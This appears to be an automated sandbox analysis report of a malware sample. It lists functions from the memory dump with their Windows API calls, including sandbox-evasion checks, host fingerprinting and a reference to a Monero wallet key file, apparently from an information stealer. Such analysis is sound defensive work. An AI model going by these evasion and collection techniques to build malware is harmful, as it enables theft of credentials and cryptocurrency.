Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 1d53187ed6b3fc7938f25d7a84c9a93290fe863ba0756d177fce9fc41e51f5ba
Instruction ID: 2b41b291826ebd475a051846776977e3d237dfbd8480ce5a8702da72daf2f820
Opcode Fuzzy Hash: 1d53187ed6b3fc7938f25d7a84c9a93290fe863ba0756d177fce9fc41e51f5ba
Instruction Fuzzy Hash: 1E110D7090014CAACB18FB64DD52AFD73B8AF50340F5085A8FA0A5B192EF70AB0EC691

Function 00BE1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BE123E
ExitProcess.KERNEL32 ref: 00BE1294

Strings

@, xrefs: 00BE1233

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: 2e179455a7766d41a22f812da629b8083da9a4a85753a65226ddbdf31f7c394f
Instruction ID: 04ae77499852a5e8aa599eac4d6a51822de22c17ef34ee12525b0ae50e35b502
Opcode Fuzzy Hash: 2e179455a7766d41a22f812da629b8083da9a4a85753a65226ddbdf31f7c394f
Instruction Fuzzy Hash: 45014FB094034CABDB10DFD9CC49BADB7B8AB14701F248494E705B6180D7B455458759

Function 00BF4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B

lstrcat.KERNEL32(?,00000000), ref: 00BF4F7A
lstrcat.KERNEL32(?,00C01070), ref: 00BF4F97
lstrcat.KERNEL32(?,01738F00), ref: 00BF4FAB
lstrcat.KERNEL32(?,00C01074), ref: 00BF4FBD

Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF492C
Part of subcall function 00BF4910: FindFirstFileA.KERNEL32(?,?), ref: 00BF4943

Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
Part of subcall function 00BF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
Part of subcall function 00BF4910: FindClose.KERNEL32(000000FF), ref: 00BF4B92

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 0479fd2cd6a89238237b7de34f796ff677774959347973e93f1596157cc39dd1
Instruction ID: c075f93ac17242b35815758337b4a01eaf4008b5737d928b4345dee1892586cd
Opcode Fuzzy Hash: 0479fd2cd6a89238237b7de34f796ff677774959347973e93f1596157cc39dd1
Instruction Fuzzy Hash: 57216B769002086BC768FB70DC46EFE73BCAB55700F0445A4B659A7181EEB497CDCB92

Function 00BF0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01738F40), ref: 00BF079A
StrCmpCA.SHLWAPI(00000000,01739050), ref: 00BF0866
StrCmpCA.SHLWAPI(00000000,01738F50), ref: 00BF099D

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 8e8b37b67dde55c61601385d4d2f7e60c8fa614ad05adf3dee681901651244ca
Instruction ID: 030bdd654794dcc8131cf997da400d8e36252252bc036dbeadd98f43e1fa006f
Opcode Fuzzy Hash: 8e8b37b67dde55c61601385d4d2f7e60c8fa614ad05adf3dee681901651244ca
Instruction Fuzzy Hash: 84918675A102099FCB2CEF64D991AFDB7F5FF94300F508568E9099B251DB30AA09CB92

Function 00BF0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,01738F40), ref: 00BF079A
StrCmpCA.SHLWAPI(00000000,01739050), ref: 00BF0866
StrCmpCA.SHLWAPI(00000000,01738F50), ref: 00BF099D

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 019f9a0f0209c9bb2d31bbcd85e1ac329035f2e0cab50cd1b13e6f2cea15026e
Instruction ID: 053922f8b0d5dff5832c717ceb1feb11aff968749d5487411ba563b36adcbbef
Opcode Fuzzy Hash: 019f9a0f0209c9bb2d31bbcd85e1ac329035f2e0cab50cd1b13e6f2cea15026e
Instruction Fuzzy Hash: 4A817A75A102099FCB1CEF64C991EFDB7F5FF94300F508569E9099B251DB30AA09CB82

Function 00BF9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00BF9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00BF94A5
CloseHandle.KERNEL32(00000000), ref: 00BF94AF

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 5b249e2fc0e8389f36709e390d4aa5729eeaa0b84dbbb022c199650fdb146f0e
Instruction ID: 88f72afe81dca3f2d3e2d1c03fd191f55742c15a9ca0a1794a9f5dc12f420290
Opcode Fuzzy Hash: 5b249e2fc0e8389f36709e390d4aa5729eeaa0b84dbbb022c199650fdb146f0e
Instruction Fuzzy Hash: 4FF0307490020CEFDB18DF94DC4AFE977B8EB08700F004494BA1957290D6B06E89CB91

Function 00BE1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BE112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00BE1132
ExitProcess.KERNEL32 ref: 00BE1143

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 28e6989673a9f04bbcb4631d559bacc011c71a47ea0a507a3e49f91c989cd150
Instruction ID: 4231900304e1c875de07c3a8a651b71811f68debbe54421d9c4b11461fa596fa
Opcode Fuzzy Hash: 28e6989673a9f04bbcb4631d559bacc011c71a47ea0a507a3e49f91c989cd150
Instruction Fuzzy Hash: A5E08670945348FFE7246BA69C0EB0C76B8EB04B01F200094F709B61C0C7B42605969A

Function 00BF1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BF7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BF7542
Part of subcall function 00BF7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BF757F
Part of subcall function 00BF7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7603
Part of subcall function 00BF7500: RtlAllocateHeap.NTDLL(00000000), ref: 00BF760A

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BF7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF76A4
Part of subcall function 00BF7690: RtlAllocateHeap.NTDLL(00000000), ref: 00BF76AB

Part of subcall function 00BF77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,00BFDBC0,000000FF,?,00BF1C99,00000000,?,0173D7F0,00000000,?), ref: 00BF77F2
Part of subcall function 00BF77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,00BFDBC0,000000FF,?,00BF1C99,00000000,?,0173D7F0,00000000,?), ref: 00BF77F9

Part of subcall function 00BF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
Part of subcall function 00BF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
Part of subcall function 00BF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F

Part of subcall function 00BF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
Part of subcall function 00BF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
Part of subcall function 00BF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F

Part of subcall function 00BF7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00C00E00,00000000,?), ref: 00BF79B0
Part of subcall function 00BF7980: RtlAllocateHeap.NTDLL(00000000), ref: 00BF79B7
Part of subcall function 00BF7980: GetLocalTime.KERNEL32(?,?,?,?,?,00C00E00,00000000,?), ref: 00BF79C4
Part of subcall function 00BF7980: wsprintfA.USER32 ref: 00BF79F3

Part of subcall function 00BF7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0173E120,00000000,?,00C00E10,00000000,?,00000000,00000000), ref: 00BF7A63
Part of subcall function 00BF7A30: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7A6A
Part of subcall function 00BF7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0173E120,00000000,?,00C00E10,00000000,?,00000000,00000000,?), ref: 00BF7A7D

Part of subcall function 00BF7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0173E120,00000000,?,00C00E10,00000000,?,00000000,00000000), ref: 00BF7B35

Part of subcall function 00BF7B90: GetKeyboardLayoutList.USER32(00000000,00000000,00C005AF), ref: 00BF7BE1
Part of subcall function 00BF7B90: LocalAlloc.KERNEL32(00000040,?), ref: 00BF7BF9
Part of subcall function 00BF7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00BF7C0D
Part of subcall function 00BF7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BF7C62
Part of subcall function 00BF7B90: LocalFree.KERNEL32(00000000), ref: 00BF7D22

Part of subcall function 00BF7D80: GetSystemPowerStatus.KERNEL32(?), ref: 00BF7DAD

